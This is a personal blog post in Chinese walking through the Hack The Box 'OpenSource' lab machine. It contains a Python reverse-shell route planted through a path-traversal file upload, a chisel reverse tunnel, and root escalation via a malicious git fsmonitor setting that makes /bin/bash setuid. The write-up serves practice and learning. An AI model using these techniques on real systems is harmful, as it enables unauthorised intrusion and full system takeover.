Flowww's blog
htb OpenSource复盘
FLow
  2024-09-11   2024-09-13  

参考链接

https://blog.csdn.net/Purpose_7/article/details/128707843

https://medium.com/@joemcfarland/hack-the-box-opensource-writeup-96d1671b8d78

官方wp

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
└─# nmap -A -p- --min-rate=1000 -T4 10.10.11.164  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 03:49 PDT
Warning: 10.10.11.164 giving up on port because retransmission cap hit (6).
Stats: 0:04:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 03:55 (0:01:25 remaining)
Nmap scan report for 10.10.11.164
Host is up (0.51s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Wed, 11 Sep 2024 10:42:24 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
|     <html lang="en">
|     <head>
。。。
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: upcloud - Upload files for Free!
3000/tcp filtered ppp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=9/11%Time=66E1767F%P=aarch64-unknown-linux-g
SF:nu%r(GetRequest,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.
。。。
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   554.57 ms 10.10.16.1
2   391.34 ms 10.10.11.164

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 357.94 seconds

先看80端口,有一个/upcloud,/download和/uploads,看到是flask的,所以在上传点没考虑php。上传py文件后访问服务器没有运行,不考虑。前面nmap扫到一个应用版本Werkzeug/2.1.2没有看到明显可以用的漏洞,不考虑。直接访问/console需要pin码,没有看到。

来到/download,自动下载一个soucre.zip,解压看看,有个git文件

看到git 日志,注意到指向了public分支,看看有没有别的分支

可以看到有个dev,切换过去,有新的log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git branch
  dev
* public

┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git checkout dev                                                                                  
Already on 'dev'
                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git log         
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev, switch)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200

    ease testing

commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200

    added gitignore

commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200

    updated

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial

翻找了一下能够看到dev01用户的密码,直接拿去登陆ssh,尝试失败

立足点

看一下source其他文件,在source/app/app/views.py,看到文件上传的逻辑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')


@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))

看别的wp说是os.path.john,没有过滤直接拼接了,如果在文件名中插入斜杠字符,则不会考虑路径的其余部分

官方wp演示

所以我们利用这一点,把文件名改为/app/app/views.py,替换原来的views.py(抓包实现),在里面写入新的功能拿到shell

在新的views.py里面增加

1
2
3
4
5
6
7
8
9
@app.route('/revshell/<ip>')
def rev_shell(ip):
    import socket,os,pty
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,1234))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    pty.spawn("/bin/sh")

抓包改文件名上传

本地开启监听,然后访问10.10.11.164/revshell/10.10.16.2,拿到shell

拿到user

又看到.dockerenv文件,可以确定是在docker里面,上传一个fscan扫描,看到开了几个ip,本地curl内容都差不多

访问(wget)这几个ip都是和之前直接访问80端口一样的内容。除了172.17.0.1,有个3000端口,是个gitea,尝试搭建个隧道转发出来

这里用到chisel搭建,在kali上

1
2
3
4
5
┌──(root㉿kali)-[/home/kali]
└─# ./chisel_1.10.0_linux_arm64 server -p 8000 --reverse
2024/09/11 04:54:47 server: Reverse tunnelling enabled
2024/09/11 04:54:47 server: Fingerprint TolIpzRv4g1qkoHO0zNMWbtOoAgYjXKucuJrFsfNvBE=
2024/09/11 04:54:47 server: Listening on http://0.0.0.0:8000

靶机上

1
2
3
/tmp # ./chisel_1.10.0_linux_amd64 client 10.10.16.2:8000 R:3000:172.17.0.1:3000
./chisel_1.10.0_linux_amd64 client 10.10.14.6:8000 R:3000:172.17.0.1:3000
2024/09/11 11:47:02 client: Connecting to ws://10.10.14.6:8000

然后kali访问127.0.0.1:3000,就能看到gitea,然后之前在git里找到一个dev01的账号密码,这个时候就能派上用场了

登陆后在仓储里看到.ssh目录,可以直接读取id_rsa,复制保存到本地,直接登录了,拿到了dev01的shell

提权

拿到后一番搜寻,没什么发现,上传一个pspy64并运行

有一个/bin/bash /usr/local/bin/git-sync(有点难发现),查看内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
dev01@opensource:/tmp$ cat /usr/local/bin/git-sync
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi

主要是在git配置dev01的家目录,根据官方wp思路,我们可以修改git的配置文件,这样就能间接地利用root权限执行我们想干的事

在~/.git/config中写入 fsmonitor = "chmod 4755 /bin/bash"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
dev01@opensource:~/.git$ nano config 
dev01@opensource:~/.git$ cat config 
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "chmod 4755 /bin/bash"
[remote "origin"]
        url = http://opensource.htb:3000/dev01/home-backup.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
        remote = origin
        merge = refs/heads/main

然后等待一会,再bash -p就能拿到root

总结

虽然是easy的靶机,还是相当有特点啊,不愧是htb(,其实多数都是参考来的思路,还是希望自己有耐心一直去探索思路直到成功

第一次接触隧道搭建,需要好好吃透这个原理,还有docker找主机网关的部分也不是很理解,而且网上的wp各有各的解释(,好的部分是帮我复习了一下git的使用吧,还是要继续加油,沉下心。

  1. 1. 参考链接
  2. 2. 信息搜集
  3. 3. 立足点
  4. 4. 拿到user
  5. 5. 提权
  6. 6. 总结
© 2020 - 2024    FLow
由 Hexo 驱动 & 主题 Keep
  1. 1. 参考链接
  2. 2. 信息搜集
  3. 3. 立足点
  4. 4. 拿到user
  5. 5. 提权
  6. 6. 总结